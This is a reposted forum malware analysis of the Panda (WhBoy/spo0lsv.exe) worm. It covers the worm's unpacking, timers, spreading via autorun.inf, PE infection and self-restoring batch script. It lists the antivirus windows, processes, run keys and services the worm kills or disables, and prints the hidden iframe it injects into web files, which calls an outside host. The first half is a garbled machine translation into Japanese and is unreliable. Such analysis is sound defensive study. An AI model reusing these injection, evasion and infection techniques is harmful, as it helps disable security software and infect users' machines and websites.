OD - パンダ

ナイトブレードの神 - 雪を見るためのフォーラムから転載

https://bbs.pediy.com/thread-224773.htm

ディレクトリ

メモ0x01の分析 - 分析ツール

0x02のウイルス情報

0x03のウイルスの挙動

0x04の砲撃

0x05のウイルス初期分析

1つの0x06でProc_クロック（クロック期間：6000ms）

2 0x07のProc_クロック（クロック周期：1000ミリ秒）

3 0x08にProc_クロック（クロック周期：120000ms）

4 0x09のProc_クロック（クロック周期：10000ms）

5 0x10のProc_クロック（クロック周期：6000ms）

6 0x11をProc_クロック（クロック周期：10000ms）

7 0x12をProc_クロック（クロック周期：180000ms）

0x13に感染スレッド分析

0x14の特定の感染過程の分析

プログラムを実行した後0x15の感染

メモ0x01の分析 - 分析ツール

"：\ WINDOWS \ SYSTEM32 \ DRIVERS \ Cを" ディレクトリは、プログラムを実行することはできません（1）このウイルスはWin7_64は少し下、XPのシステム分析に優れています。

<私は、ウイルスの動作環境を決定しようとするためにここに長い時間、ウイルス解析を開催、多くのウイルスは、特定の環境で実行されています>

（2）2つの非常に重要なAPIは、コールバック&&クロックスレッドのコールバックは、分析を必要とします。

SetTimer：ウイルスは、多くの場合、クロックで指定されたプロセスの最後にタイムアウトしました。

CreateThread：他のコードの分岐を実行し、感染したPEファイルからコードが実行のスレッドを使用することです。

（3）IDA署名機能を、アシスト分析多くを識別できる機能を。

分析ツール

火口の剣：敏感な動作の検知をするときODの動的デバッグ解析機能がうまく機能を支援するために、非常に良いです。

OD、IDA、010Editor：

BCompare：六角アライメントプログラム感染前および感染後

PEツール：&&シェルプログラミング言語識別チェック。

0x02のウイルス情報

（1）ファイルサイズ：30,001バイト

（2）MD5。512301C535C88255C9A252FDF70B7A03

（3）シェル：FSGのV2.0

（4）言語で書かれた：デルファイ

0x03のウイルスの挙動

（1）スタートアップ項目を書きます

（2）サービスを閉じ

（3）PEファイル感染

必要に更新するか否か（4）指定されたURLへのアクセスを決定します

<|システム隠さ>（5）文書のリリース、および設定ファイルの属性

（6）プロセスの権限を強化します

（7）指定されたウィンドウ名にQUITメッセージを送信する、ウィンドウ名を横断し、指定されたプロセスの終わり

0x04の砲撃

（1）シェルを確認

（1）OEPで実行するには、そのファイルをダンプします。

（2）表のIATの終わりを修復した後、ImpRECツールの修理砲撃の成功を入力するためにテーブルを使用しています。

0x05のウイルス初期分析

（1）文字列を変更するか否かが決定されます

（2）3つの最も重要な機能

（3）Desktop_.iniかどうかが決定

（4）自体がメモリに読み込まれ

（5）： "C \ WINDOWS \ SYSTEM32 \ドライバ\ spo0lsv.exe" 大文字にし、そして自分のパスを対比

あなたがいない "C：\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe" を行う場合には（6）を実行している時に、 "：\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe C" に自身をコピーします。

"C：\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe" を実行し、自分自身を終了

1つの0x06でProc_クロック（クロック期間：6000ms）

（1）必要性は、文書のリリースを決定した場合

（2）手紙に自分自身をコピーし、ディスクを横断：\ setup.exeを

（3）ディスクを横断、手紙を作成：\ AUTORUN.INFファイルを

（4）設定setup.exeファイル属性、<システム、隠されました>

（5）に配置されたautorun.infファイル属性、<システム、隠されました>

（6）設定項目を書きます

2 0x07のProc_クロック（クロック周期：1000ミリ秒）

（1）プロセスの権限を昇格

（2）指定されたウィンドウ名にQUITメッセージを送信する、ウィンドウ名を横断し、指定されたプロセスの終わり

ウィンドウリストを探します：

ファイアウォール、プロセス、VirusScanの、NOD32、インターネットセキュリティ、アンチウイルス、Kingsoftの、ライジング、Jiangminは、スーパーウサギ、最適化の第一人者、トロイの木馬スカベンジャー、スカベンジャートロイの木馬、カスペルスキーアンチウイルス

Symantec AntiVirus,Duba,esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor,Wrapped giftKiller

Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf(ustc),IceSword,

结束的进程列表:

Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,

Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,

FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe

(3) 写启动项

(4) 设置隐藏的文件和文件夹,不可见

0x08 Proc_时钟3 (时钟周期: 120000ms)

(1) 通过 “http://www.ac86.cn/66/up.txt” 这个地址来更新, 网址已经失效了

0x09 Proc_时钟4 (时钟周期: 10000ms)

(1) 遍历磁盘, 关闭共享

(2) 关闭admin的共享

(3) 杀死当前时钟

0x10 Proc_时钟5 (时钟周期: 6000ms)

(1) 将杀毒软件的注册表启动项设置为失效, 设置值为2, 被针对的杀毒软件注册表启动项列表如下:

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"

"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"

(2) 使用两种方式停止服务程序, 被停止的列表如下:

"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"

"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"

"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"

"NPFMntor","NPFMntor","FireSvc"

0x11 Proc_时钟6 (时钟周期: 10000ms)

() 会获取这些网站的网页源码:

"http://www.tom.com"

"http://www.163.com"

"http://www.sohu.com"

"http://www.yahoo.com"

"http://www.google.com"

0x12 Proc_时钟7 (时钟周期: 180000ms)

(1) 通过 “http://update.whboy.net/worm.txt” 这个地址来更新, 网址已经失效了

0x13 感染线程分析

(1) 感染线程回调函数

(2) 获取所有磁盘名

(3) 遍历磁盘_感染目标

(4) 感染的文件类型为: "EXE", "SRC", "PIF", "COM"

(5) 在网页文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.

0x14 具体感染流程分析

(1) 读入目标文件

(2) 从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了

(3) 设置目标文件属性为 “NORMAL”

(4) 将自身复制为目标文件

(5) 将目标程序追加到病毒后面

(6) 感染后的标志为 “WhBoy” + 被感染程序名 + “.exe”

0x15 感染后程序的运行

(1) <感染后程序> 的结构,

(2) 判断是否被感染, 感染则跳转

(3) 创建 自身进程名 + “.exe”文件

(4) 从自身中提取 <源程序> 并写到 “BeInfected.exe.exe”

(5) 在 Temp目录 写批处理 并 运行批处理

批处理内容:

//循环删除自身, 直至删除成功
:try1
​
del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
​
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1
​
//将 BeInfected.exe.exe 修改为 BeInfected.exe, 并运行 BeInfected.exe.
​
ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"
​
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2
​
"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
​
:try2
​
del %0

执行生成的批处理

(6) <感染后程序> 就被还原成 <源程序> 了, 并运行 <源程序>.

(1) 有什么错误请大神们指出.

(2) 并感谢15PB老师们的帮助和教导.